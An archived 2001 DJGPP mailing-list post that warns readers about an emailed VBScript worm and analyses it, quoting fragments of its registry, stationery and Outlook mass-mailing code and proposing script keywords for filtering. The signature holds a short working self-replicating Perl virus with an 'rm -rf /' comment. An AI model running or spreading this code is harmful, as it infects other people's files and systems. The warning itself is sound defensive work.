www.delorie.com/archives/browse.cgi   search  
Mail Archives: djgpp/2001/05/12/05:00:16

From: eins AT durchnull DOT de (Rudolf Polzer)
Newsgroups: comp.os.msdos.djgpp
Subject: Virus warning (was: Re: Help)
References: <000101c0daaa$a4907540$0c00a8c0 AT persystems>
X-newsgroup: comp.os.msdos.djgpp
X-realname: Javier Mendez
X-Ringtones: http://ringtones AT durchnull DOT de
X-Original: no
Message-ID: <slrn9fq2co.227.eins@www42.t-offline.de>
User-Agent: slrn/0.9.6.3 (Linux)
Date: Sat, 12 May 2001 11:59:53 +0200
Lines: 71
NNTP-Posting-Host: 213.7.23.27
X-Trace: 989654686 news.freenet.de 30289 213.7.23.27
X-Complaints-To: abuse AT freenet DOT de
To: djgpp AT delorie DOT com
DJ-Gateway: from newsgroup comp.os.msdos.djgpp
Reply-To: djgpp AT delorie DOT com

Javier Mendez <jmendez AT persystems DOT com> wrote:
[VBS virus]

Note to the poster:
GET A WORKING VIRUS SCANNER!!! YOU ARE INFECTED!!!

To anyone who has read the original message using Outlook or Outlook Express:
Get a working virus scanner! You might be infected.

To DJ Delorie:
Could you make your mailing list software reject posings containing JavaScript
or VBScript (these substrings may indicate this:
'JavaScript:'
'<SCRIPT'
'VBScript:'
or could you make the software automatically remove all HTML (interpret using
Lynx or some other HTML renderer) and only post plaintext?


Analysis:

> <HTML><HEAD>
> <Title> Help </Title></HEAD>
> <Body> <script language=3D'VBScript'>
[...]
> Rem I am sorry! happy time

May be a virus named 'happy time', I did not know it yet. But I can say what it
does:

> f1 =3D Rg(Ks & "Help\FileName")

It infects some windows help thing...

> If (CInt(Cn) Mod 366) =3D 0 Then
> If (CInt(Second(Time)) Mod 2) =3D 0 Then
> Tsend
> Else
> adds =3D Og
> Msend (adds)
> End If
> End If

> wp =3D Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")

writes itself as active desktop wallpaper...

> MSH =3D oe & "\Message Send HTML"
> CUS =3D oe & "\Compose Use Stationery"
> SN =3D oe & "\Stationery Name"
> Rw MSH, 1
> Rw CUS, 1
> Rw SN, bf

writes itself as Outlook Express stationery...

does some harmful things (did not further analyze, but searches files and
does something on them)

> Set Oo =3D CreateObject("Outlook.Application")

and mails itself to anyone in his mailing list.

So the poster is just infected and had djgpp AT delorie DOT com in his address book.


-- 
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################

- Raw text -


  webmaster     delorie software   privacy  
  Copyright © 2019   by DJ Delorie     Updated Jul 2019